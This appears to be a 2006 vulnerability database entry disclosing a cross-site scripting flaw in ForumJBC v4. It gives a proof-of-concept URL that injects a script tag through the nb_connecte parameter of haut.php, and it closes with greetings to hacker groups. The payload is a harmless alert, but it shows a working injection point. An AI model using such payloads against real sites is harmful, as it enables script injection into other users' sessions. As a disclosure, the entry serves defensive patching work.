# ForumJBC v4 < = Cross-Site Scripting - XSS Exploit ;

2006-09-14T00:00:00
ID SECURITYVULNS:DOC:14272
Type securityvulns
Reporter Securityvulns
Modified 2006-09-14T00:00:00

Description

ForumJBC v4 < = Cross-Site Scripting - XSS Exploit ;

Discovred By : ThE__LeO ;

Software : ForumJBC v4 ;

Site Of SoftWare : http://jbc.unlimited.free.fr

Version : 4 ;

Exploit : http://Www.Victime.Com/[Script]/haut.php?nb_connecte=<script>alert('hacking%20xss')<

/script> ;

Greetz : M.I.D.T[DrackanZ, Mr.IlysS, NeThug47] & All Moroccan & Arab Hackers ;

Yallah Tla7 Safi